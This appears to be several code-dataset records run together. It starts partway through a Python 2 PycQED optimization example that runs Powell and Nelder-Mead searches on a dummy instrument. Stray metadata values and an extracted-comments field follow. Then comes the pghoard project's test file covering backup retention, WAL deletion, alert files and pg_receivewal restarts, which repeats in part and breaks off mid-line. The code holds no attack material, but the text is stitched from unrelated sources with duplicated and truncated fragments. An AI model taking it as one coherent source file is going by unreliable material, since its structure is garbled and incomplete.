'maxfun': maxfun, 'minimize': False, 'f_termination': .4} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') 
MA.OptimizationAnalysis(auto=True, label=name) # Example 5 testing direc argument of Powell. name = 'Powel_direction scale =1 no direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'x_scale': 1, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) name = 'Powel_direction scale = 1 direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'ftol': ftol, 'direc': ([.2, 0], [0, .1]), # direc is a tuple of vectors 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name)
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA ''' Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. ''' FakeSample = qt.instruments.create('FakeSample', 'Bart_parameter_holder', dummy_instrument=True) MC = qt.instruments['MC'] try: MC.remove() except: pass MC = qt.instruments.create('MC', 'MeasurementControl', dummy_instrument=True) ''' Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. 
add termination condition V ''' class sweep_function1(Soft_Sweep): def __init__(self, **kw): super(sweep_function1, self).__init__() # From Soft_Sweep the self.sweep_control = 'soft' self.name = 'Sweep_function1' self.parameter_name = 'x' self.unit = 'unit_x' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_x(val) class sweep_function2(Soft_Sweep): def __init__(self, **kw): super(sweep_function2, self).__init__() self.name = 'Sweep_function2' self.parameter_name = 'y' self.unit = 'unit_y' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_y(val) class test_detector(object): def __init__(self, **kw): self.FakeSample = qt.instruments['FakeSample'] self.detector_control = 'soft' def acquire_data_point(self, **kw): return self.FakeSample.measure_convexity() def prepare(self,**kw): pass def finish(self,**kw): pass class test_parabolic_detector(test_detector): def __init__(self, **kw): super(test_parabolic_detector, self).__init__() self.value_names = 'F' self.value_units = 'unit_F' def acquire_data_point(self, **kw): return self.FakeSample.measure_2D_sinc() #sweepfunctions and detector sweepfunctions = [sweep_function1(), sweep_function2()] detector = test_parabolic_detector() start_val = np.array([1, 1]) initial_stepsize = np.array([-.1, .2]) # Initial guess x0 = start_val/initial_stepsize # Scaling parameters x_scale = 1/initial_stepsize bounds0 = np.array([(-100, 100), (-100, 100)]).T/initial_stepsize # needs to be rearranged bounds = np.zeros((len(bounds0[0]),2)) # Bounds for parameters (unused in Powell) for i in range(len(bounds0[0])): bounds[i][0] = bounds0[0][i] bounds[i][1] = bounds0[1][i] ftol = 1e-3 xtol = 1e-4 maxiter = 500 # Maximum No. iterations maxfun = 500 # Maximum No. 
function evaluations factr = 1e7 #1e7 pgtol = 1e-1 #2e-2 epsilon = 1e-1 #1e-2 epsilon_COBYLA = 0.2 # Initial step length accuracy_COBYLA = 1e-2 # Convergence tolerance constraints = np.array([100, 100]) minimize = True noise = 0.01 # Maximum amplitude of the Zero-Mean White Noise FakeSample.set_noise(noise) # Example 1 find optimum using Powell method: name = 'Powell method' MC.set_sweep_functions(sweepfunctions) # sets swf1 and swf2 MC.set_detector_function(detector) # sets test_detector ad_func_pars = {'adaptive_function': 'Powell', 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 2 find optimum by using a function that got passed by hand. name = 'Nelder method' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 3 make use of termination condition name = 'Nelder_with_termination' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize, 'f_termination': -1.95} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 4 make use of termination condition with maximize name = 'Nelder_maximize' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': False, 'f_termination': .4} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') 
MA.OptimizationAnalysis(auto=True, label=name) # Example 5 testing direc argument of Powell. name = 'Powel_direction scale =1 no direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'x_scale': 1, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) name = 'Powel_direction scale = 1 direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'ftol': ftol, 'direc': ([.2, 0], [0, .1]), # direc is a tuple of vectors 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name)
en
0.748529
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. add termination condition V # From Soft_Sweep the self.sweep_control = 'soft' #sweepfunctions and detector # Initial guess # Scaling parameters # needs to be rearranged # Bounds for parameters (unused in Powell) # Maximum No. iterations # Maximum No. function evaluations #1e7 #2e-2 #1e-2 # Initial step length # Convergence tolerance # Maximum amplitude of the Zero-Mean White Noise # Example 1 find optimum using Powell method: # sets swf1 and swf2 # sets test_detector # Example 2 find optimum by using a function that got passed by hand. # Example 3 make use of termination condition # Example 4 make use of termination condition with maximize # Example 5 testing direc argument of Powell. # direc is a tuple of vectors
2.078907
2
test/test_pghoard.py
Adnuntius/pghoard
731
6627910
<filename>test/test_pghoard.py """ pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details """ import datetime import io import json import os import tarfile import time from pathlib import Path from unittest.mock import Mock, patch from pghoard import common from pghoard.common import (BaseBackupFormat, create_alert_file, delete_alert_file, write_json_file) from pghoard.pghoard import PGHoard from pghoard.pgutil import create_connection_string # pylint: disable=attribute-defined-outside-init from pghoard.rohmu import rohmufile from .base import PGHoardTestCase from .util import switch_wal, wait_for_xlog class TestPGHoard(PGHoardTestCase): def setup_method(self, method): super().setup_method(method) self.config = self.config_template({ "backup_sites": { self.test_site: { "basebackup_count": 1, "basebackup_interval_hours": 1, "nodes": [ { "host": "127.0.0.4", }, ], }, }, }) config_path = os.path.join(self.temp_dir, "pghoard.json") write_json_file(config_path, self.config) self.pghoard = PGHoard(config_path) # This is the "final storage location" when using "local" storage type self.local_storage_dir = os.path.join( self.config["backup_sites"][self.test_site]["object_storage"]["directory"], self.test_site ) self.real_check_pg_server_version = self.pghoard.check_pg_server_version self.pghoard.check_pg_server_version = Mock(return_value=90404) self.real_check_pg_versions_ok = self.pghoard.check_pg_versions_ok self.pghoard.check_pg_versions_ok = Mock(return_value=True) def teardown_method(self, method): self.pghoard.quit() self.pghoard.check_pg_server_version = self.real_check_pg_server_version self.pghoard.check_pg_versions_ok = self.real_check_pg_versions_ok super().teardown_method(method) @patch("subprocess.check_output") def test_handle_site(self, subprocess_mock): subprocess_mock.return_value = b"""\ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname|""" self.pghoard.handle_site(self.test_site, self.config["backup_sites"][self.test_site]) assert 
len(self.pghoard.receivexlogs) == 1 or len(self.pghoard.walreceivers) == 1 assert len(self.pghoard.time_of_last_backup_check) == 1 def test_get_local_basebackups_info(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") os.makedirs(basebackup_storage_path) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] bb_path = os.path.join(basebackup_storage_path, "2015-07-03_0") # Handle case where metadata file does not exist assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-03 12:00:00+00:00"}, fp) available_backup = self.pghoard.get_remote_basebackups_info(self.test_site)[0] assert available_backup["name"] == "2015-07-03_0" start_time = datetime.datetime(2015, 7, 3, 12, tzinfo=datetime.timezone.utc) assert available_backup["metadata"]["start-time"] == start_time assert available_backup["metadata"]["backup-reason"] == "scheduled" assert available_backup["metadata"]["normalized-backup-time"] is None assert available_backup["metadata"]["backup-decision-time"] bb_path = os.path.join(basebackup_storage_path, "2015-07-02_9") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 12:00:00+00:00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-03_0" bb_path = os.path.join(basebackup_storage_path, "2015-07-02_10") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 22:00:00+00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] 
== "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-02_10" assert basebackups[2]["name"] == "2015-07-03_0" def test_determine_backups_to_delete(self): now = datetime.datetime.now(datetime.timezone.utc) bbs = [ { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=10, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=1) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=8, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=7, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=20) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=5, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=4, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=3, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=2, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=1, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(hours=4) } }, ] site_config = { "basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": 24, } bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 8 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of 
the backups are too old (start time + interval is over 8 days in the past) assert len(bbs_copy) == 10 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 9 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count trumps backup age and backups are removed even though they're not too old assert len(bbs_copy) == 9 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 2 site_config["basebackup_count_min"] = 6 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count_min ensures not that many backups are removed even though they're too old assert len(bbs_copy) == 6 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count_min"] = 2 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are new enough (start time less than 3 days in the past) assert len(bbs_copy) == 3 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly site_config = {"basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": None} bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == 
bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] def test_local_refresh_backup_list_and_delete_old(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") wal_storage_path = os.path.join(self.local_storage_dir, "xlog") os.makedirs(basebackup_storage_path) os.makedirs(wal_storage_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_and_wal_files(what): for bb, wals in what.items(): if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) with open(bb_path, "wb") as fp: fp.write(b"something") with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wals[0], "start-time": start_time.isoformat(), }, fp) for wal in wals: with open(os.path.join(wal_storage_path, wal), "wb") as fp: fp.write(b"something") backups_and_wals = { "2015-08-25_0": [ # NOTE: gap between this and next segment means that cleanup shouldn't find this "000000010000000A000000FB", ], "2015-08-25_1": [ "000000020000000A000000FD", "000000020000000A000000FE", ], "2015-08-25_2": [ "000000030000000A000000FF", "000000030000000B00000000", "000000030000000B00000001", "000000040000000B00000002", ], "2015-08-25_3": [ # Both of these should be saved "000000040000000B00000003", "000000040000000B00000004", ], } write_backup_and_wal_files(backups_and_wals) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 3 # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. 
Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. new_backups_and_wals = { "": [ "000000020000000A000000FC", "000000020000000A000000FD", "000000020000000A000000FE", "000000020000000A000000FF", "000000020000000B00000000", "000000020000000B00000001", "000000020000000B00000002", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(new_backups_and_wals) assert len(os.listdir(wal_storage_path)) == 11 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 expected_wal_count = len(backups_and_wals["2015-08-25_0"]) expected_wal_count += len(new_backups_and_wals[""]) expected_wal_count += len(new_backups_and_wals["2015-08-25_4"]) assert len(os.listdir(wal_storage_path)) == expected_wal_count # Now put WAL files in place with no gaps anywhere gapless_backups_and_wals = { "2015-08-25_3": [ "000000030000000B00000003", "000000040000000B00000004", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(gapless_backups_and_wals) assert len(os.listdir(wal_storage_path)) >= 10 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 1 def test_local_refresh_backup_list_and_delete_old_delta_format(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") basebackup_delta_path = os.path.join(self.local_storage_dir, "basebackup_delta") os.makedirs(basebackup_storage_path) os.makedirs(basebackup_delta_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_files(what): for bb, bb_data in what.items(): wal_start, hexdigests = bb_data if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in 
bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) metadata = { "manifest": { "snapshot_result": { "state": { "files": [{ "relative_path": h, "hexdigest": h } for h in hexdigests] } } } } mtime = time.time() blob = io.BytesIO(common.json_encode(metadata, binary=True)) ti = tarfile.TarInfo(name=".pghoard_tar_metadata.json") ti.size = len(blob.getbuffer()) ti.mtime = mtime with open(bb_path, "wb") as fp: with rohmufile.file_writer( compression_algorithm="snappy", compression_level=0, fileobj=fp ) as output_obj: with tarfile.TarFile(fileobj=output_obj, mode="w") as tar: tar.addfile(ti, blob) input_size = output_obj.tell() for h in hexdigests: with open(Path(basebackup_delta_path) / h, "w") as digest_file, \ open((Path(basebackup_delta_path) / (h + ".metadata")), "w") as digest_meta_file: json.dump({}, digest_file) json.dump({}, digest_meta_file) with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wal_start, "start-time": start_time.isoformat(), "format": BaseBackupFormat.delta_v1, "compression-algorithm": "snappy", "original-file-size": input_size }, fp) backups_and_delta = { "2015-08-25_0": ( "000000010000000A000000AA", [ "<KEY>", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" ] ), "2015-08-25_1": [ "000000020000000A000000AB", ["<KEY>"] ], "2015-08-25_2": [ "000000030000000A000000AC", ["214967296374cae6f099e19910b33a0893f0abc62f50601baa2875ab055cd27b"] ], "2015-08-25_3": [ "000000040000000B00000003", [ "<KEY>", "<KEY>" ] ], } write_backup_files(backups_and_delta) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "<KEY>", 
"<KEY>" ] new_delta_data = { "2015-08-25_4": ( "000000040000000B00000004", [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] ) } write_backup_files(new_delta_data) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 2 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] def test_alert_files(self): alert_file_path = os.path.join(self.config["alert_file_dir"], "test_alert") create_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is True delete_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is False def test_backup_state_file(self): self.pghoard.write_backup_state_to_json_file() state_path = self.config["json_state_file_path"] with open(state_path, "r") as fp: state = json.load(fp) empty_state = { "startup_time": self.pghoard.state["startup_time"], "backup_sites": {}, "compressors": [{}] * self.config["compression"]["thread_count"], "queues": { "compression_queue": 0, "transfer_queue": 0, }, "served_files": {}, "transfer_agent_state": {}, "pg_receivexlogs": {}, "pg_basebackups": {}, "walreceivers": {}, } assert empty_state == state def test_startup_walk_for_missed_compressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) with open(os.path.join(compressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "0000000F.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, 
"0000000F.history.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz.metadata"), "wb") as fp: fp.write(b"{}") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 0 assert self.pghoard.transfer_queue.qsize() == 2 def test_startup_walk_for_missed_uncompressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) uncompressed_wal_path = compressed_wal_path + "_incoming" with open(os.path.join(uncompressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "00000002.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 2 assert self.pghoard.transfer_queue.qsize() == 0 class TestPGHoardWithPG: def test_auth_alert_files(self, db, pghoard): def clean_alert_files(): for f in os.listdir(pghoard.config["alert_file_dir"]): os.unlink(os.path.join(pghoard.config["alert_file_dir"], f)) # connecting using the proper user should work and not yield any alerts clean_alert_files() conn_str = create_connection_string(db.user) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is not None assert os.listdir(pghoard.config["alert_file_dir"]) == [] # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version del pghoard.config["backup_sites"][pghoard.test_site]["pg_version"] clean_alert_files() conn_str = create_connection_string(dict(db.user, user="nonexistent")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # so should the disabled 
user clean_alert_files() conn_str = create_connection_string(dict(db.user, user="disabled")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # existing user with an invalid password should cause an authentication error clean_alert_files() conn_str = create_connection_string(dict(db.user, user="<PASSWORD>")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["authentication_error"] def test_pause_on_disk_full(self, db, pghoard_separate_volume, caplog): pghoard = pghoard_separate_volume conn = db.connect() conn.autocommit = True wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. 
for _ in range(16): # Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted switch_wal(conn) conn.close() wait_for_xlog(pghoard, 15) assert "pausing pg_receive(wal|xlog)" in caplog.text def test_surviving_pg_receivewal_hickup(self, db, pghoard): wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) conn = db.connect() conn.autocommit = True # Make sure we have already a few files so pg_receivewal has something to start from when it eventually restarts # +1: to finish the current one for _ in range(3 + 1): switch_wal(conn) wait_for_xlog(pghoard, 3) # stop pg_receivewal so we cannot process new WAL segments pghoard.receivexlogs[pghoard.test_site].running = False if pghoard.receivexlogs[pghoard.test_site].is_alive(): pghoard.receivexlogs[pghoard.test_site].join() del pghoard.receivexlogs[pghoard.test_site] n_xlogs = pghoard.transfer_agent_state[pghoard.test_site]["upload"]["xlog"]["xlogs_since_basebackup"] # add more WAL segments for _ in range(10): switch_wal(conn) conn.close() # restart pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) assert pghoard.receivexlogs[pghoard.test_site].is_alive() # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted wait_for_xlog(pghoard, n_xlogs + 10)
<filename>test/test_pghoard.py """ pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details """ import datetime import io import json import os import tarfile import time from pathlib import Path from unittest.mock import Mock, patch from pghoard import common from pghoard.common import (BaseBackupFormat, create_alert_file, delete_alert_file, write_json_file) from pghoard.pghoard import PGHoard from pghoard.pgutil import create_connection_string # pylint: disable=attribute-defined-outside-init from pghoard.rohmu import rohmufile from .base import PGHoardTestCase from .util import switch_wal, wait_for_xlog class TestPGHoard(PGHoardTestCase): def setup_method(self, method): super().setup_method(method) self.config = self.config_template({ "backup_sites": { self.test_site: { "basebackup_count": 1, "basebackup_interval_hours": 1, "nodes": [ { "host": "127.0.0.4", }, ], }, }, }) config_path = os.path.join(self.temp_dir, "pghoard.json") write_json_file(config_path, self.config) self.pghoard = PGHoard(config_path) # This is the "final storage location" when using "local" storage type self.local_storage_dir = os.path.join( self.config["backup_sites"][self.test_site]["object_storage"]["directory"], self.test_site ) self.real_check_pg_server_version = self.pghoard.check_pg_server_version self.pghoard.check_pg_server_version = Mock(return_value=90404) self.real_check_pg_versions_ok = self.pghoard.check_pg_versions_ok self.pghoard.check_pg_versions_ok = Mock(return_value=True) def teardown_method(self, method): self.pghoard.quit() self.pghoard.check_pg_server_version = self.real_check_pg_server_version self.pghoard.check_pg_versions_ok = self.real_check_pg_versions_ok super().teardown_method(method) @patch("subprocess.check_output") def test_handle_site(self, subprocess_mock): subprocess_mock.return_value = b"""\ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname|""" self.pghoard.handle_site(self.test_site, self.config["backup_sites"][self.test_site]) assert 
len(self.pghoard.receivexlogs) == 1 or len(self.pghoard.walreceivers) == 1 assert len(self.pghoard.time_of_last_backup_check) == 1 def test_get_local_basebackups_info(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") os.makedirs(basebackup_storage_path) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] bb_path = os.path.join(basebackup_storage_path, "2015-07-03_0") # Handle case where metadata file does not exist assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-03 12:00:00+00:00"}, fp) available_backup = self.pghoard.get_remote_basebackups_info(self.test_site)[0] assert available_backup["name"] == "2015-07-03_0" start_time = datetime.datetime(2015, 7, 3, 12, tzinfo=datetime.timezone.utc) assert available_backup["metadata"]["start-time"] == start_time assert available_backup["metadata"]["backup-reason"] == "scheduled" assert available_backup["metadata"]["normalized-backup-time"] is None assert available_backup["metadata"]["backup-decision-time"] bb_path = os.path.join(basebackup_storage_path, "2015-07-02_9") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 12:00:00+00:00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-03_0" bb_path = os.path.join(basebackup_storage_path, "2015-07-02_10") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 22:00:00+00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] 
